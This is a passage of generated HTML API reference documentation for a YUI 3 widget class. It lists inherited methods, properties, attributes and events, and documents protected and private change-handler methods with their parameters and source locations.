<a href="#method_getStrings">getStrings</a>
<span class="flag deprecated">deprecated</span>
</li>
<li class="index-item method inherited">
<a href="#method_getTargets">getTargets</a>
</li>
<li class="index-item method inherited">
<a href="#method_hide">hide</a>
</li>
<li class="index-item method inherited inherited">
<a href="#method_init">init</a>
</li>
<li class="index-item method protected inherited">
<a href="#method_initializer">initializer</a>
</li>
<li class="index-item method public inherited">
<a href="#method_isNested">isNested</a>
</li>
<li class="index-item method inherited">
<a href="#method_isRoot">isRoot</a>
</li>
<li class="index-item method inherited">
<a href="#method_modifyAttr">modifyAttr</a>
</li>
<li class="index-item method inherited">
<a href="#method_move">move</a>
</li>
<li class="index-item method inherited">
<a href="#method_next">next</a>
</li>
<li class="index-item method inherited">
<a href="#method_on">on</a>
</li>
<li class="index-item method inherited">
<a href="#method_once">once</a>
</li>
<li class="index-item method inherited">
<a href="#method_onceAfter">onceAfter</a>
</li>
<li class="index-item method inherited">
<a href="#method_parseType">parseType</a>
</li>
<li class="index-item method inherited">
<a href="#method_previous">previous</a>
</li>
<li class="index-item method inherited">
<a href="#method_publish">publish</a>
</li>
<li class="index-item method inherited">
<a href="#method_removeAttr">removeAttr</a>
</li>
<li class="index-item method inherited">
<a href="#method_removeButton">removeButton</a>
</li>
<li class="index-item method inherited">
<a href="#method_removeTarget">removeTarget</a>
</li>
<li class="index-item method inherited">
<a href="#method_render">render</a>
</li>
<li class="index-item method protected inherited">
<a href="#method_renderer">renderer</a>
</li>
<li class="index-item method protected inherited">
<a href="#method_renderUI">renderUI</a>
</li>
<li class="index-item method inherited">
<a href="#method_reset">reset</a>
</li>
<li class="index-item method inherited inherited">
<a href="#method_set">set</a>
</li>
<li class="index-item method inherited inherited">
<a href="#method_setAttrs">setAttrs</a>
</li>
<li class="index-item method inherited">
<a href="#method_setStdModContent">setStdModContent</a>
</li>
<li class="index-item method inherited">
<a href="#method_show">show</a>
</li>
<li class="index-item method inherited">
<a href="#method_sizeShim">sizeShim</a>
</li>
<li class="index-item method deprecated inherited">
<a href="#method_subscribe">subscribe</a>
<span class="flag deprecated">deprecated</span>
</li>
<li class="index-item method protected inherited">
<a href="#method_syncUI">syncUI</a>
</li>
<li class="index-item method inherited">
<a href="#method_syncXY">syncXY</a>
</li>
<li class="index-item method inherited inherited">
<a href="#method_toString">toString</a>
</li>
<li class="index-item method deprecated inherited">
<a href="#method_unsubscribe">unsubscribe</a>
<span class="flag deprecated">deprecated</span>
</li>
<li class="index-item method deprecated inherited">
<a href="#method_unsubscribeAll">unsubscribeAll</a>
<span class="flag deprecated">deprecated</span>
</li>
</ul>
</div>
<div class="index-section properties">
<h3>Properties</h3>
<ul class="index-list properties extends">
<li class="index-item property protected inherited">
<a href="#property__allowAdHocAttrs">_allowAdHocAttrs</a>
</li>
<li class="index-item property protected inherited">
<a href="#property__buttonsHandles">_buttonsHandles</a>
</li>
<li class="index-item property protected inherited">
<a href="#property__buttonsMap">_buttonsMap</a>
</li>
<li class="index-item property protected inherited">
<a href="#property__defaultButton">_defaultButton</a>
</li>
<li class="index-item property protected inherited">
<a href="#property__posAlignUIHandles">_posAlignUIHandles</a>
</li>
<li class="index-item property private inherited">
<a href="#property__UI_ATTRS">_UI_ATTRS</a>
</li>
<li class="index-item property inherited">
<a href="#property_BOUNDING_TEMPLATE">BOUNDING_TEMPLATE</a>
</li>
<li class="index-item property inherited">
<a href="#property_BUTTONS">BUTTONS</a>
</li>
<li class="index-item property inherited">
<a href="#property_BUTTONS_TEMPLATE">BUTTONS_TEMPLATE</a>
</li>
<li class="index-item property inherited">
<a href="#property_CONTENT_TEMPLATE">CONTENT_TEMPLATE</a>
</li>
<li class="index-item property inherited">
<a href="#property_DEF_PARENT_NODE">DEF_PARENT_NODE</a>
</li>
<li class="index-item property inherited">
<a href="#property_DEF_UNIT">DEF_UNIT</a>
</li>
<li class="index-item property inherited">
<a href="#property_DEFAULT_BUTTONS_SECTION">DEFAULT_BUTTONS_SECTION</a>
</li>
<li class="index-item property deprecated inherited">
<a href="#property_name">name</a>
<span class="flag deprecated">deprecated</span>
</li>
<li class="index-item property inherited">
<a href="#property_STACK">STACK</a>
</li>
<li class="index-item property inherited">
<a href="#property_UI_EVENTS">UI_EVENTS</a>
</li>
</ul>
</div>
<div class="index-section attrs">
<h3>Attributes</h3>
<ul class="index-list attrs extends">
<li class="index-item attr inherited">
<a href="#attr_align">align</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_alignOn">alignOn</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_bodyContent">bodyContent</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_boundingBox">boundingBox</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_buttons">buttons</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_centered">centered</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_constrain">constrain</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_contentBox">contentBox</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_defaultButton">defaultButton</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_destroyed">destroyed</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_disabled">disabled</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_fillHeight">fillHeight</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_focused">focused</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_focusOn">focusOn</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_footerContent">footerContent</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_headerContent">headerContent</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_height">height</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_hideOn">hideOn</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_id">id</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_initialized">initialized</a>
</li>
<li class="index-item attr deprecated inherited">
<a href="#attr_locale">locale</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_maskNode">maskNode</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_modal">modal</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_preventOverlap">preventOverlap</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_render">render</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_rendered">rendered</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_shim">shim</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_srcNode">srcNode</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_strings">strings</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_tabIndex">tabIndex</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_visible">visible</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_width">width</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_x">x</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_xy">xy</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_y">y</a>
</li>
<li class="index-item attr inherited">
<a href="#attr_zIndex">zIndex</a>
</li>
</ul>
</div>
<div class="index-section events">
<h3>Events</h3>
<ul class="index-list events extends">
<li class="index-item event inherited">
<a href="#event_destroy">destroy</a>
</li>
<li class="index-item event inherited">
<a href="#event_init">init</a>
</li>
<li class="index-item event inherited">
<a href="#event_widget:contentUpdate">widget:contentUpdate</a>
</li>
<li class="index-item event inherited">
<a href="#event_widget:render">widget:render</a>
</li>
</ul>
</div>
</div>
<div id="methods" class="api-class-tabpanel">
<h2 class="off-left">Methods</h2>
<div id="method__addAttrs" class="method item private inherited">
<h3 class="name"><code>_addAttrs</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>cfgs</code>
</li>
<li class="arg">
<code>values</code>
</li>
<li class="arg">
<code>lazy</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeCore.html#method__addAttrs">AttributeCore</a>:
<a href="../files/attribute_js_AttributeCore.js.html#l741"><code>attribute/js/AttributeCore.js:741</code></a>
</p>
</div>
<div class="description">
<p>Implementation behind the public addAttrs method. </p>
<p>This method is invoked directly by get if it encounters a scenario
in which an attribute's valueFn attempts to obtain the
value an attribute in the same group of attributes, which has not yet
been added (on demand initialization).</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">cfgs</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>An object with attribute name/configuration pairs.</p>
</div>
</li>
<li class="param">
<code class="param-name">values</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>An object with attribute name/value pairs, defining the initial values to apply.
Values defined in the cfgs argument will be over-written by values in this argument unless defined as read only.</p>
</div>
</li>
<li class="param">
<code class="param-name">lazy</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
<p>Whether or not to delay the intialization of these attributes until the first call to get/set.
Individual attributes can over-ride this behavior by defining a lazyAdd configuration property in their configuration.
See <a href="#method_addAttr">addAttr</a>.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__addLazyAttr" class="method item private inherited">
<h3 class="name"><code>_addLazyAttr</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>name</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeCore.html#method__addLazyAttr">AttributeCore</a>:
<a href="../files/attribute_js_AttributeCore.js.html#l312"><code>attribute/js/AttributeCore.js:312</code></a>
</p>
</div>
<div class="description">
<p>Finishes initializing an attribute which has been lazily added.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">name</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The name of the attribute</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__addShimResizeHandlers" class="method item private inherited">
<h3 class="name"><code>_addShimResizeHandlers</code></h3>
<span class="paren">()</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#method__addShimResizeHandlers">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l327"><code>widget-stack/js/Widget-Stack.js:327</code></a>
</p>
</div>
<div class="description">
<p>Sets up event listeners to resize the shim when the size of the Widget changes.</p>
<p>
NOTE: This method is only used for IE6 currently, since IE6 doesn't support a way to
resize the shim purely through CSS, when the Widget does not have an explicit width/height
set.
</p>
</div>
</div>
<div id="method__addStdModContent" class="method item private inherited">
<h3 class="name"><code>_addStdModContent</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>node</code>
</li>
<li class="arg">
<code>children</code>
</li>
<li class="arg">
<code>where</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__addStdModContent">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l545"><code>widget-stdmod/js/Widget-StdMod.js:545</code></a>
</p>
</div>
<div class="description">
<p>Helper method to add content to a StdMod section node.
The content is added either before, after or replaces the existing node content
based on the value of the <code>where</code> argument.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">node</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>The section Node to be updated.</p>
</div>
</li>
<li class="param">
<code class="param-name">children</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a> | <a href="../classes/NodeList.html" class="crosslink">NodeList</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The new content Node, NodeList or String to be added to section Node provided.</p>
</div>
</li>
<li class="param">
<code class="param-name">where</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>Optional. Either WidgetStdMod.AFTER, WidgetStdMod.BEFORE or WidgetStdMod.REPLACE.
If not provided, the content will replace existing content in the Node.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__afterAlignChange" class="method item protected inherited">
<h3 class="name"><code>_afterAlignChange</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionAlign.html#method__afterAlignChange">WidgetPositionAlign</a>:
<a href="../files/widget-position-align_js_Widget-PositionAlign.js.html#l616"><code>widget-position-align/js/Widget-PositionAlign.js:616</code></a>
</p>
</div>
<div class="description">
<p>Handles <code>alignChange</code> events by updating the UI in response to <code>align</code>
Attribute changes.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
</div>
<div id="method__afterAlignOnChange" class="method item protected inherited">
<h3 class="name"><code>_afterAlignOnChange</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionAlign.html#method__afterAlignOnChange">WidgetPositionAlign</a>:
<a href="../files/widget-position-align_js_Widget-PositionAlign.js.html#l631"><code>widget-position-align/js/Widget-PositionAlign.js:631</code></a>
</p>
</div>
<div class="description">
<p>Handles <code>alignOnChange</code> events by updating the alignment-syncing event
handlers.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
</div>
<div id="method__afterBodyChange" class="method item protected inherited">
<h3 class="name"><code>_afterBodyChange</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__afterBodyChange">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l344"><code>widget-stdmod/js/Widget-StdMod.js:344</code></a>
</p>
</div>
<div class="description">
<p>Default attribute change listener for the bodyContent attribute, responsible
for updating the UI, in response to attribute changes.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The event facade for the attribute change</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__afterButtonsChange" class="method item protected inherited">
<h3 class="name"><code>_afterButtonsChange</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__afterButtonsChange">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l1188"><code>widget-buttons/js/widget-buttons.js:1188</code></a>
</p>
<p>Available since 3.4.0</p>
</div>
<div class="description">
<p>Handles this widget's <code>buttonsChange</code> event which fires anytime the
<code>buttons</code> attribute is modified.</p>
<p><strong>Note:</strong> This method special-cases the <code>buttons</code> modifications caused by
<code>addButton()</code> and <code>removeButton()</code>, both of which set the <code>src</code> property on
the event facade to "add" and "remove" respectively.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
</div>
<div id="method__afterChildSelectedChange" class="method item protected inherited">
<h3 class="name"><code>_afterChildSelectedChange</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>event</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__afterChildSelectedChange">Widget</a>:
<a href="../files/widget-child_js_Widget-Child.js.html#l327"><code>widget-child/js/Widget-Child.js:327</code></a>
</p>
</div>
<div class="description">
<p>Default attribute change listener for the <code>selected</code>
attribute, responsible for updating the UI, in response to
attribute changes.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">event</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The event facade for the attribute change.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__afterConstrainChange" class="method item protected inherited">
<h3 class="name"><code>_afterConstrainChange</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionConstrain.html#method__afterConstrainChange">WidgetPositionConstrain</a>:
<a href="../files/widget-position-constrain_js_Widget-PositionConstrain.js.html#l275"><code>widget-position-constrain/js/Widget-PositionConstrain.js:275</code></a>
</p>
</div>
<div class="description">
<p>After change listener for the "constrain" attribute, responsible
for updating the UI, in response to attribute changes.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The event facade</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__afterContentChangeButtons" class="method item protected inherited">
<h3 class="name"><code>_afterContentChangeButtons</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__afterContentChangeButtons">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l1237"><code>widget-buttons/js/widget-buttons.js:1237</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Handles this widget's <code>headerContentChange</code>, <code>bodyContentChange</code>,
<code>footerContentChange</code> events by making sure the <code>buttons</code> remain rendered
after changes to the content areas.</p>
<p>These events are very chatty, so extra caution is taken to avoid doing extra
work or getting into an infinite loop.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
</div>
<div id="method__afterDefaultButtonChange" class="method item protected inherited">
<h3 class="name"><code>_afterDefaultButtonChange</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__afterDefaultButtonChange">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l1261"><code>widget-buttons/js/widget-buttons.js:1261</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Handles this widget's <code>defaultButtonChange</code> event by adding the
"yui3-button-primary" CSS class to the new <code>defaultButton</code> and removing it
from the old default button.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
</div>
<div id="method__afterFillHeightChange" class="method item protected inherited">
<h3 class="name"><code>_afterFillHeightChange</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__afterFillHeightChange">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l372"><code>widget-stdmod/js/Widget-StdMod.js:372</code></a>
</p>
</div>
<div class="description">
<p>Default attribute change listener for the fillHeight attribute, responsible
for updating the UI, in response to attribute changes.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The event facade for the attribute change</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__afterFocusOnChange" class="method item inherited">
<h3 class="name"><code>_afterFocusOnChange</code></h3>
<span class="paren">()</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#method__afterFocusOnChange">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l546"><code>widget-modality/js/Widget-Modality.js:546</code></a>
</p>
</div>
<div class="description">
<p>Default function called when focusOn Attribute is changed. Remove existing listeners and create new listeners.</p>
</div>
</div>
<div id="method__afterFooterChange" class="method item protected inherited">
<h3 class="name"><code>_afterFooterChange</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__afterFooterChange">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l358"><code>widget-stdmod/js/Widget-StdMod.js:358</code></a>
</p>
</div>
<div class="description">
<p>Default attribute change listener for the footerContent attribute, responsible
for updating the UI, in response to attribute changes.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The event facade for the attribute change</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__afterHeaderChange" class="method item protected inherited">
<h3 class="name"><code>_afterHeaderChange</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__afterHeaderChange">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l330"><code>widget-stdmod/js/Widget-StdMod.js:330</code></a>
</p>
</div>
<div class="description">
<p>Default attribute change listener for the headerContent attribute, responsible
for updating the UI, in response to attribute changes.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The event facade for the attribute change</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__afterHideOnChange" class="method item inherited">
<h3 class="name"><code>_afterHideOnChange</code></h3>
<span class="paren">()</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetAutohide.html#method__afterHideOnChange">WidgetAutohide</a>:
<a href="../files/widget-autohide_js_Widget-Autohide.js.html#l218"><code>widget-autohide/js/Widget-Autohide.js:218</code></a>
</p>
</div>
<div class="description">
<p>Default function called when hideOn Attribute is changed. Remove existing listeners and create new listeners.</p>
</div>
</div>
<div id="method__afterHostVisibleChangeAutohide" class="method item protected inherited">
<h3 class="name"><code>_afterHostVisibleChangeAutohide</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetAutohide.html#method__afterHostVisibleChangeAutohide">WidgetAutohide</a>:
<a href="../files/widget-autohide_js_Widget-Autohide.js.html#l206"><code>widget-autohide/js/Widget-Autohide.js:206</code></a>
</p>
</div>
<div class="description">
<p>Default function called when the visibility of the widget changes. Determines
whether to attach or detach event listeners based on the visibility of the widget.</p>
</div>
</div>
<div id="method__afterHostVisibleChangeModal" class="method item inherited">
<h3 class="name"><code>_afterHostVisibleChangeModal</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#method__afterHostVisibleChangeModal">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l454"><code>widget-modality/js/Widget-Modality.js:454</code></a>
</p>
</div>
<div class="description">
<p>Default function that is called when visibility is changed on the widget.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The event facade of the change</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__afterHostZIndexChangeModal" class="method item inherited">
<h3 class="name"><code>_afterHostZIndexChangeModal</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#method__afterHostZIndexChangeModal">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l465"><code>widget-modality/js/Widget-Modality.js:465</code></a>
</p>
</div>
<div class="description">
<p>Default function that is called when z-index is changed on the widget.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The event facade of the change</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__afterShimChange" class="method item protected inherited">
<h3 class="name"><code>_afterShimChange</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#method__afterShimChange">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l237"><code>widget-stack/js/Widget-Stack.js:237</code></a>
</p>
</div>
<div class="description">
<p>Default attribute change listener for the shim attribute, responsible
for updating the UI, in response to attribute changes.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The event facade for the attribute change</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__afterVisibleChangeButtons" class="method item protected inherited">
<h3 class="name"><code>_afterVisibleChangeButtons</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__afterVisibleChangeButtons">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l1275"><code>widget-buttons/js/widget-buttons.js:1275</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Handles this widget's <code>visibleChange</code> event by focusing the <code>defaultButton</code>
if there is one.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
</div>
<div id="method__afterXYChange" class="method item protected inherited">
<h3 class="name"><code>_afterXYChange</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPosition.html#method__afterXYChange">WidgetPosition</a>:
<a href="../files/widget-position_js_Widget-Position.js.html#l244"><code>widget-position/js/Widget-Position.js:244</code></a>
</p>
</div>
<div class="description">
<p>Default attribute change listener for the xy attribute, responsible
for updating the UI, in response to attribute changes.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The event facade for the attribute change</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__afterZIndexChange" class="method item protected inherited">
<h3 class="name"><code>_afterZIndexChange</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#method__afterZIndexChange">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l249"><code>widget-stack/js/Widget-Stack.js:249</code></a>
</p>
</div>
<div class="description">
<p>Default attribute change listener for the zIndex attribute, responsible
for updating the UI, in response to attribute changes.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
